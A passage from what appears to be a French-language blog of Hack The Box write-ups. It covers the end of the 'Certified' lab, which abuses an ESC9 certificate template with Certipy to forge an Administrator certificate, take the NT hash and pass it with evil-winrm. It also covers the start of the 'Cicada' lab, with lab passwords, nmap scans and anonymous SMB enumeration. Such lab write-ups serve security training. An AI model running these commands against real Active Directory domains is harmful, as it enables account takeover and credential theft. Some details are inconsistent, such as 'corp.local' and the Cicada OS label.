Finding certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">34</span> certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Finding certificate authorities </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">1</span> certificate authority </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found <span class="m">12</span> enabled certificate templates </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;DC01.certified.htb&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to resolve: DC01.certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via CSRA </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to get DCOM connection <span class="k">for</span>: DC01.certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via CSRA: <span class="o">[</span>Errno -2<span class="o">]</span> Name or service not known </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via RRP </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> via RRP: <span class="o">[</span>Errno Connection error <span class="o">(</span>DC01.certified.htb:445<span class="o">)]</span> <span class="o">[</span>Errno -2<span class="o">]</span> Name or service not known </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to get CA configuration <span class="k">for</span> <span class="s1">&#39;certified-DC01-CA&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;DC01.certified.htb&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Failed to resolve: DC01.certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Connecting to DC01.certified.htb:80 </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Got error <span class="k">while</span> trying to check <span class="k">for</span> web enrollment: <span class="o">[</span>Errno -2<span class="o">]</span> Name or service not known </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Enumeration output: </span></span><span class="line"><span class="cl">Certificate Authorities </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> CA Name : certified-DC01-CA </span></span><span class="line"><span class="cl"> DNS Name : DC01.certified.htb </span></span><span class="line"><span class="cl"> Certificate Subject : <span class="nv">CN</span><span class="o">=</span>certified-DC01-CA, <span class="nv">DC</span><span class="o">=</span>certified, <span class="nv">DC</span><span class="o">=</span>htb </span></span><span class="line"><span class="cl"> Certificate Serial Number : 36472F2C180FBB9B4983AD4D60CD5A9D </span></span><span class="line"><span class="cl"> Certificate Validity Start : 2024-05-13 15:33:41+00:00 </span></span><span class="line"><span class="cl"> Certificate Validity End : 2124-05-13 15:43:41+00:00 </span></span><span class="line"><span class="cl"> Web Enrollment : Disabled </span></span><span class="line"><span class="cl"> User Specified SAN : Unknown </span></span><span class="line"><span class="cl"> Request Disposition : Unknown </span></span><span class="line"><span class="cl"> Enforce Encryption <span class="k">for</span> Requests : Unknown </span></span><span class="line"><span class="cl">Certificate Templates </span></span><span class="line"><span class="cl"> <span class="m">0</span> </span></span><span class="line"><span class="cl"> Template Name : CertifiedAuthentication </span></span><span class="line"><span class="cl"> Display Name : Certified Authentication </span></span><span class="line"><span class="cl"> Certificate Authorities : certified-DC01-CA </span></span><span class="line"><span class="cl"> Enabled : True </span></span><span class="line"><span class="cl"> Client Authentication : True </span></span><span class="line"><span class="cl"> Enrollment Agent : False </span></span><span class="line"><span class="cl"> Any Purpose : False </span></span><span class="line"><span class="cl"> Enrollee Supplies Subject : False </span></span><span class="line"><span class="cl"> Certificate Name Flag : SubjectRequireDirectoryPath </span></span><span class="line"><span class="cl"> SubjectAltRequireUpn </span></span><span class="line"><span class="cl"> Enrollment Flag : NoSecurityExtension </span></span><span class="line"><span class="cl"> AutoEnrollment </span></span><span class="line"><span class="cl"> PublishToDs </span></span><span class="line"><span class="cl"> Private Key Flag : <span class="m">16842752</span> </span></span><span class="line"><span class="cl"> Extended Key Usage : Server Authentication </span></span><span class="line"><span class="cl"> Client Authentication </span></span><span class="line"><span class="cl"> Requires Manager Approval : False </span></span><span class="line"><span class="cl"> Requires Key Archival : False </span></span><span class="line"><span class="cl"> Authorized Signatures Required : <span class="m">0</span> </span></span><span class="line"><span class="cl"> Validity Period : <span class="m">1000</span> years </span></span><span class="line"><span class="cl"> Renewal Period : <span class="m">6</span> weeks </span></span><span class="line"><span class="cl"> Minimum RSA Key Length : <span class="m">2048</span> </span></span><span class="line"><span class="cl"> Permissions </span></span><span class="line"><span class="cl"> Enrollment Permissions </span></span><span class="line"><span class="cl"> Enrollment Rights : CERTIFIED.HTB<span class="se">\o</span>perator ca </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> Object Control Permissions </span></span><span class="line"><span class="cl"> Owner : CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Owner Principals : CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Dacl Principals : CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> Write Property Principals : CERTIFIED.HTB<span class="se">\D</span>omain Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\E</span>nterprise Admins </span></span><span class="line"><span class="cl"> CERTIFIED.HTB<span class="se">\A</span>dministrator </span></span><span class="line"><span class="cl"> <span class="o">[</span>!<span class="o">]</span> Vulnerabilities </span></span><span class="line"><span class="cl"> ESC9 : <span class="s1">&#39;CERTIFIED.HTB\\operator ca&#39;</span> can enroll and template has no security extension </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit-esc9-vulnerability">Exploit ESC9 vulnerability </h3><p>#### Modifying the userPrincipalName (UPN) attribute of ca_operator <strong>management_svc</strong> modifie l’UPN de <strong>ca_operator</strong> (son identifiant d’utilisateur principal) pour qu’il corresponde à Administrator (sans le domaine @corp.local). L’UPN modifié reste valide car il ne correspond pas exactement à celui d’Administrator (qui est <a class="link" href="mailto:Administrator@corp.local" >Administrator@corp.local</a>).</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Updating user <span class="s1">&#39;ca_operator&#39;</span>: </span></span><span class="line"><span class="cl"> userPrincipalName : Administrator </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully updated <span class="s1">&#39;ca_operator&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="requesting-certificate">Requesting Certificate </h4><ul> <li>management_svc demande un certificat en se faisant passer pour ca_operator, mais avec l’UPN modifié à Administrator.</li> <li>Le modèle de certificat ESC9 (mal configuré) permet d’émettre un certificat sans inclure de sécurité supplémentaire (par exemple, des extensions empêchant les abus).</li> </ul> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad req -username ca_operator@certified.htb -hashes 94994b74f29662fc4d702f2f3b0df327 -ca certified-DC01-CA -template CertifiedAuthentication </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence <span class="s1">&#39;\(&#39;</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;(0x[a-zA-Z0-9]+) \([-]?[0-9]+ &#34;</span>, </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting certificate via RPC </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully requested certificate </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Request ID is <span class="m">23</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got certificate with UPN <span class="s1">&#39;Administrator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Certificate has no object SID </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved certificate and private key to <span class="s1">&#39;administrator.pfx&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="restoring-the-upn-of-ca_operator">Restoring the UPN of ca_operator </h4><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad account update -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user <span class="s1">&#39;ca_operator&#39;</span> -upn <span class="s1">&#39;ca_operator@certified.htb&#39;</span> -debug </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Trying to resolve <span class="s1">&#39;CERTIFIED.HTB&#39;</span> at <span class="s1">&#39;10.0.2.3&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Resolved <span class="s1">&#39;CERTIFIED.HTB&#39;</span> from cache: 10.10.11.41 </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Authenticating to LDAP server </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bound to ldaps://10.10.11.41:636 - ssl </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Default path: <span class="nv">DC</span><span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Configuration path: <span class="nv">CN</span><span class="o">=</span>Configuration,DC<span class="o">=</span>certified,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Updating user <span class="s1">&#39;ca_operator&#39;</span>: </span></span><span class="line"><span class="cl"> userPrincipalName : ca_operator@certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Successfully updated <span class="s1">&#39;ca_operator&#39;</span> </span></span></code></pre></td></tr></table> </div> </div><h4 id="retrieving-nt-hash-via-forged-certificate">Retrieving NT Hash via Forged Certificate </h4><p>Attempting authentication with the issued certificate now yields the NT hash of <a class="link" href="mailto:Administrator@corp.local" >Administrator@corp.local</a>. The command must include -domain <domain> due to the certificate&rsquo;s lack of domain specification:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span><span class="lnt">9 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">certipy-ad auth -pfx ./administrator.pfx -domain certified.htb </span></span><span class="line"><span class="cl">Certipy v4.8.2 - by Oliver Lyak <span class="o">(</span>ly4k<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Using principal: administrator@certified.htb </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to get TGT... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got TGT </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Saved credential cache to <span class="s1">&#39;administrator.ccache&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Trying to retrieve NT <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator&#39;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Got <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator@certified.htb&#39;</span>: aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34 </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">evil-winrm -i 10.10.11.41 -u Administrator -H 0d5b49608bbce1751f708748f67e2d34 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.7 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../Desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; ls </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Directory: C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Mode LastWriteTime Length Name </span></span><span class="line"><span class="cl">---- ------------- ------ ---- </span></span><span class="line"><span class="cl">-ar--- 12/10/2024 9:26 AM <span class="m">34</span> root.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">dc1c.....fb35 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/cicada-htb/Fri, 06 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/cicada-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Cicada cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Cicada</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.35</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">michael.wrightson:<span class="sb">`</span>Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8<span class="sb">`</span> </span></span><span class="line"><span class="cl">david.orelious:<span class="sb">`</span>aRt<span class="nv">$Lp</span><span class="c1">#7t*VQ!3`</span> </span></span><span class="line"><span class="cl">emily.oscars:<span class="sb">`</span>Q!3@Lp#M6b*7t*Vt<span class="sb">`</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap 10.10.11.35 -sV -sC -T4 -Pn </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">53/tcp open domain Simple DNS Plus </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: cicada.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: TLS randomness does not represent <span class="nb">time</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>CICADA-DC.cicada.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:CICADA-DC.cicada.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-08-22T20:24:16 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2025-08-22T20:24:16 </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: cicada.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssl-cert: Subject: <span class="nv">commonName</span><span class="o">=</span>CICADA-DC.cicada.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::&lt;unsupported&gt;, DNS:CICADA-DC.cicada.htb </span></span><span class="line"><span class="cl"><span class="p">|</span> Not valid before: 2024-08-22T20:24:16 </span></span><span class="line"><span class="cl"><span class="p">|</span>_Not valid after: 2025-08-22T20:24:16 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssl-date: TLS randomness does not represent <span class="nb">time</span> </span></span><span class="line"><span class="cl">Service Info: Host: CICADA-DC<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 3:1:1: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2024-12-01T07:50:09 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: N/A </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: 7h00m00s </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="smb--hr-share">SMB : HR share </h3><p>On vérifie les Share SMB disponible en se connectant de manière anonyme avec la commande:</p> <blockquote> <p>smbclient -N -L //10.10.11.35</p> </blockquote> <p>On obtient les shares suivant:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Sharename Type Comment </span></span><span class="line"><span class="cl"> --------- ---- ------- </span></span><span class="line"><span class="cl"> ADMIN$ Disk Remote Admin </span></span><span class="line"><span class="cl"> C$ Disk Default share </span></span><span class="line"><span class="cl"> DEV Disk </span></span><span class="line"><span class="cl"> HR Disk </span></span><span class="line"><span class="cl"> IPC$ IPC Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON Disk Logon server share </span></span><span class="line"><span class="cl"> SYSVOL Disk Logon server share </span></span></code></pre></td></tr></table> </div> </div><p><code>DEV</code> et <code>HR</code> semblent intéressant ! On va donc vérifier si ils sont accessibles de manière anononyme:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## DEV</span> </span></span><span class="line"><span class="cl">$ smbclient //10.10.11.35/DEV -N </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl">NET_STATUS_ACCESS_DENIED </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## HR</span> </span></span><span class="line"><span class="cl">$ smbclient //10.10.11.35/HR -N </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Thu Mar <span class="m">14</span> 08:29:09 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Thu Mar <span class="m">14</span> 08:21:29 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> Notice from HR.txt A <span class="m">1266</span> Wed Aug <span class="m">28</span> 13:31:48 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> get <span class="s2">&#34;Notice from HR.txt&#34;</span> </span></span><span class="line"><span class="cl">getting file <span class="se">\N</span>otice from HR.txt of size <span class="m">1266</span> as Notice from HR.txt <span class="o">(</span>6.1 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 6.1 KiloBytes/sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>On obtient un fichier avec des credentials, notamment un mot de passe: <code>Cicada$M6Corpb*@Lp#nZp!8</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">cat Notice<span class="se">\ </span>from<span class="se">\ </span>HR.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dear new hire! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Welcome to Cicada Corp! We<span class="s1">&#39;re thrilled to have you join our team. As part of our security protocols, it&#39;</span>s essential that you change your default password to something unique and secure. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Your default password is: Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">To change your password: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above. </span></span><span class="line"><span class="cl">2. Once logged in, navigate to your account settings or profile settings section. </span></span><span class="line"><span class="cl">3. Look <span class="k">for</span> the option to change your password. This will be labeled as <span class="s2">&#34;Change Password&#34;</span>. </span></span><span class="line"><span class="cl">4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters. </span></span><span class="line"><span class="cl">5. After changing your password, make sure to save your changes. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Remember, your password is a crucial aspect of keeping your account secure. Please <span class="k">do</span> not share your password with anyone, and ensure you use a complex password. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">If you encounter any issues or need assistance with changing your password, don<span class="err">&#39;</span>t hesitate to reach out to our support team at support@cicada.htb. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Thank you <span class="k">for</span> your attention to this matter, and once again, welcome to the Cicada Corp team! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Best regards, </span></span><span class="line"><span class="cl">Cicada Corp </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-enumeration">User enumeration </h3><p>La prochaine étape est donc de recuperer le nom d&rsquo;utilisateur relié a ce mot de passe. J&rsquo;ai pu tester de très nombreux scripts pour lister les noms d&rsquo;utilisateurs sans avoir de compte. Une seule commande à fonctionné :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 